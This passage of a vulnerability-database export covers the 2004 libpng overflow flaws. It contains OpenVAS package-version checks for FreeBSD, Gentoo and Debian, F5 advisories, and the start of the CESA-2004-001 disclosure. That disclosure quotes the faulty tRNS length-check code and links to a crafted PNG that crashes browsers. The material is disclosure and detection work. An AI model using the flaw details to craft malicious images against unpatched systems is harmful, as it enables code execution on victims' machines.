\"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: ImageMagick, ImageMagick-nox11\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ImageMagick\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.4.2\")<0) {\n txt += 'Package ImageMagick version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ImageMagick-nox11\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.4.2\")<0) {\n txt += 'Package ImageMagick-nox11 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-28T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52422", "href": "http://plugins.openvas.org/nasl.php?oid=52422", "type": "openvas", "title": "FreeBSD Ports: png", "sourceData": "#\n#VID f9e3e60b-e650-11d8-9b0a-000347a4fa7d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n png\n linux-png\n firefox\n thunderbird\n linux-mozilla\n linux-mozilla-devel\n mozilla\n mozilla-gtk1\n netscape-communicator\n netscape-navigator\n linux-netscape-communicator\n linux-netscape-navigator\n ko-netscape-navigator-linux\n ko-netscape-communicator-linux\n ja-netscape-communicator-linux\n ja-netscape-navigator-linux\n netscape7\n ja-netscape7\n pt_BR-netscape7\n fr-netscape7\n de-netscape7\n\nCVE-2004-0597\nMultiple buffer overflows in libpng 1.2.5 and earlier, as used in\nmultiple products, allow remote attackers to execute arbitrary code\nvia malformed PNG images in which (1) the png_handle_tRNS function\ndoes not properly validate the length of transparency chunk (tRNS)\ndata, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do\nnot perform sufficient bounds checking.\n\nCVE-2004-0598\nThe png_handle_iCCP function in libpng 1.2.5 and earlier allows remote\nattackers to cause a denial of service (application crash) via a\ncertain PNG image that triggers a null dereference.\n\nCVE-2004-0599\nMultiple integer overflows in the (1) png_read_png in pngread.c or (2)\npng_handle_sPLT functions in pngrutil.c or (3) progressive display\nimage reading capability in libpng 1.2.5 and earlier allow remote\nattackers to cause a denial of service (application crash) via a\nmalformed PNG image.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52422);\n script_version(\"$Revision: 4164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-28 09:03:16 +0200 (Wed, 28 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: png\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://scary.beasts.org/security/CESA-2004-001.txt\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/12219\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/12232\");\n script_xref(name : \"URL\" , value : \"http://bugzilla.mozilla.org/show_bug.cgi?id=251381\");\n script_xref(name : \"URL\" , value : \"http://dl.sourceforge.net/sourceforge/libpng/ADVISORY.txt\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/370853\");\n script_xref(name : \"URL\" , value : \"http://www.vuxml.org/freebsd/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"png\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.2.5_7\")<=0) {\n txt += 'Package png version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-png\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.14_3\")<=0) {\n txt += 'Package linux-png version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.2\")>=0 && revcomp(a:bver, b:\"1.2.2\")<=0) {\n txt += 'Package linux-png version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.3\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.7.3\")<0) {\n txt += 'Package thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2\")<0) {\n txt += 'Package linux-mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-mozilla-devel\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2\")<0) {\n txt += 'Package linux-mozilla-devel version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2,2\")<0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"1.8.a,2\")>=0 && revcomp(a:bver, b:\"1.8.a2,2\")<=0) {\n txt += 'Package mozilla version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"mozilla-gtk1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.7.2\")<0) {\n txt += 'Package mozilla-gtk1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape-communicator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.78\")<=0) {\n txt += 'Package netscape-communicator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape-navigator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.78\")<=0) {\n txt += 'Package netscape-navigator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-netscape-communicator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package linux-netscape-communicator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-netscape-navigator\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package linux-netscape-navigator version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ko-netscape-navigator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ko-netscape-navigator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ko-netscape-communicator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ko-netscape-communicator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape-communicator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ja-netscape-communicator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape-navigator-linux\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.8\")<=0) {\n txt += 'Package ja-netscape-navigator-linux version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.1\")<=0) {\n txt += 'Package netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.1\")<=0) {\n txt += 'Package ja-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pt_BR-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.02\")<=0) {\n txt += 'Package pt_BR-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"fr-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.02\")<=0) {\n txt += 'Package fr-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"de-netscape7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.02\")<=0) {\n txt += 'Package de-netscape7 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0758", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0763"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200408-22.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54652", "href": "http://plugins.openvas.org/nasl.php?oid=54652", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200408-22 (mozilla)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New releases of Mozilla, Epiphany, Galeon, Mozilla Thunderbird, and Mozilla\nFirefox fix several vulnerabilities, including remote DoS and buffer\noverflows.\";\ntag_solution = \"All users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv your-version\n # emerge your-version\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200408-22\nhttp://bugs.gentoo.org/show_bug.cgi?id=57380\nhttp://bugs.gentoo.org/show_bug.cgi?id=59419\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200408-22.\";\n\n \n\nif(description)\n{\n script_id(54652);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0763\", \"CVE-2004-0758\", \"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200408-22 (mozilla)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/mozilla\", unaffected: make_list(\"ge 1.7.2\"), vulnerable: make_list(\"lt 1.7.2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/mozilla-firefox\", unaffected: make_list(\"ge 0.9.3\"), vulnerable: make_list(\"lt 0.9.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"mail-client/mozilla-thunderbird\", unaffected: make_list(\"ge 0.7.3\"), vulnerable: make_list(\"lt 0.7.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/mozilla-bin\", unaffected: make_list(\"ge 1.7.2\"), vulnerable: make_list(\"lt 1.7.2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/mozilla-firefox-bin\", unaffected: make_list(\"ge 0.9.3\"), vulnerable: make_list(\"lt 0.9.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"mail-client/mozilla-thunderbird-bin\", unaffected: make_list(\"ge 0.7.3\"), vulnerable: make_list(\"lt 0.7.3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/epiphany\", unaffected: make_list(\"ge 1.2.7-r1\"), vulnerable: make_list(\"lt 1.2.7-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"net-www/galeon\", unaffected: make_list(\"ge 1.3.17\"), vulnerable: make_list(\"lt 1.3.17\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1363", "CVE-2004-0768", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update to libpng\nannounced via advisory DSA 536-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53226", "href": "http://plugins.openvas.org/nasl.php?oid=53226", "type": "openvas", "title": "Debian Security Advisory DSA 536-1 (libpng)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_536_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 536-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Chris Evans discovered several vulnerabilities in libpng:\n\nCVE-2004-0597 - Multiple buffer overflows exist, including when\nhandling transparency chunk data, which could be exploited to cause\narbitrary code to be executed when a specially crafted PNG image is\nprocessed\n\nCVE-2004-0598 - Multiple NULL pointer dereferences in\npng_handle_iCPP() and elsewhere could be exploited to cause an\napplication to crash when a specially crafted PNG image is processed\n\nCVE-2004-0599 - Multiple integer overflows in png_handle_sPLT(),\npng_read_png() nctions and elsewhere could be exploited to cause an\napplication to crash, or potentially arbitrary code to be executed,\nwhen a specially crafted PNG image is processed\n\nIn addition, a bug related to CVE-2002-1363 was fixed:\n\nCVE-2004-0768 - A buffer overflow could be caused by incorrect\ncalculation of buffer offsets, possibly leading to the execution of\narbitrary code\n\nFor the current stable distribution (woody), these problems have been\nfixed in libpng3 version 1.2.1-1.1.woody.7 and libpng version\n1.0.12-3.woody.7.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you update your libpng and libpng3 packages.\";\ntag_summary = \"The remote host is missing an update to libpng\nannounced via advisory DSA 536-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20536-1\";\n\nif(description)\n{\n script_id(53226);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\", \"CVE-2004-0768\", \"CVE-2002-1363\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 536-1 (libpng)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpng2\", ver:\"1.0.12-3.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng2-dev\", ver:\"1.0.12-3.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng-dev\", ver:\"1.2.1-1.1.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng3\", ver:\"1.2.1-1.1.woody.7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599"], "description": "The remote host is missing an update to libpng3\nannounced via advisory DSA 571-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53262", "href": "http://plugins.openvas.org/nasl.php?oid=53262", "type": "openvas", "title": "Debian Security Advisory DSA 571-1 (libpng3)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_571_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 571-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several integer overflows have been discovered by its upstream\ndevelopers in libpng, a commonly used library to display PNG graphics.\nThey could be exploited to cause arbitrary code to be executed when a\nspecially crafted PNG image is processed.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.2.1-1.1.woody.9.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.2.5.0-9.\n\nWe recommend that you upgrade your libpng3 packages.\";\ntag_summary = \"The remote host is missing an update to libpng3\nannounced via advisory DSA 571-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20571-1\";\n\nif(description)\n{\n script_id(53262);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 571-1 (libpng3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpng-dev\", ver:\"1.2.1-1.1.woody.9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpng3\", ver:\"1.2.1-1.1.woody.9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "f5": [{"lastseen": "2020-04-06T22:39:33", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "", "edition": 1, "modified": "2018-07-03T23:33:00", "published": "2007-05-17T04:00:00", "id": "F5:K4009", "href": "https://support.f5.com/csp/article/K4009", "title": "Vulnerabilities in libpng - CAN-2004-0597, CAN-2004-0598, CAN-2004-0599", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-11-09T00:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "edition": 1, "description": "These vulnerabilities are described as methods under which an attacker could generate a **PNG** file that would cause applications that use **libpng** to execute arbitrary code. Since an attacker would require **root** access to the BIG-IP or 3-DNS in order to exploit this vulnerability, it is considered to be a minor risk.\n\nF5 Product Development tracked this issue as CR39078, and it was fixed in BIG-IP version 4.5.11 and 4.6.3, in which the version of **libpng** was upgraded to version 1.2.5.\n", "modified": "2011-02-03T00:00:00", "published": "2007-05-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/4000/000/sol4009.html", "id": "SOL4009", "title": "SOL4009 - Vulnerabilities in libpng - CAN-2004-0597, CAN-2004-0598, CAN-2004-0599", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\r\nCESA-2004-001 - rev 3\r\n\r\nlibPNG 1.2.5 stack-based buffer overflow and other code concerns\r\n================================================================\r\n\r\nPrograms : libpng users including mozilla, konqueror, various e-mail\r\n clients, generally lots. Also reports that some versions of\r\n IE are vulnerable to some of the problems.\r\nSeverity : - A malicious website serving a malicious PNG file could\r\n compromise the browsers of visitors.\r\n - A malicious PNG could be sent via e-mail and compromise\r\n the e-mail viewer of the recipient.\r\n - For systems with user-providable images for "face\r\n browsers", a local system compromise could be possible via\r\n a malicious PNG.\r\nCAN identifier(s): CAN-2004-0597 (the serious one), CAN-2004-0598,\r\n CAN-2004-0599\r\nCERT VU#s : VU#388984 (the serious one), VU#236656, VU#160448,\r\n VU#477512, VU#817368, VU#286464\r\n\r\nThis advisory lists code flaws discovered by inspection of the libpng-1.2.5\r\ncode. Only the first one has been examined in practice to confirm\r\nexploitability. The other flaws certainly warrant fixing.\r\n\r\nA patch which should plug all these issues is appended beneath the advisory.\r\nNOTE! This patch serves as demo purposes for the flaws only. An official\r\nv1.2.6 libpng with an official, slightly different fix will be released by\r\nthe libpng team in parallel with this advisory.\r\n\r\n1) Remotely exploitable stack-based buffer overrun in png_handle_tRNS\r\n(pngrutil.c)\r\n\r\nIf a PNG file is of the correct format, a length check on PNG data is missed\r\nprior to filling a buffer on the stack from the PNG data. The exact flaw would\r\nseem to be a logic error; failure to bail out of a function after a warning\r\ncondition is hit, here:\r\n\r\n if (!(png_ptr->mode & PNG_HAVE_PLTE))\r\n {\r\n /* Should be an error, but we can cope with it */\r\n png_warning(png_ptr, "Missing PLTE before tRNS");\r\n }\r\n else if (length > (png_uint_32)png_ptr->num_palette)\r\n {\r\n png_warning(png_ptr, "Incorrect tRNS chunk length");\r\n png_crc_finish(png_ptr, length);\r\n return;\r\n }\r\n\r\nWe can see, if the first warning condition is hit, the length check is missed\r\ndue to the use of an "else if".\r\n\r\nA PNG crafted to trip this is available at\r\nhttp://scary.beasts.org/misc/pngtest_bad.png\r\n\r\nIt crashes both mozilla and konqueror.\r\nA scarier possibility is targetted exploitation by e-mailing a nasty PNG to\r\nsomeone who uses a graphical e-mail client to decode PNGs with a vulnerable\r\nlibpng.\r\n\r\n\r\n2) Dangerous code in png_handle_sBIT (pngrutil.c) (Similar code 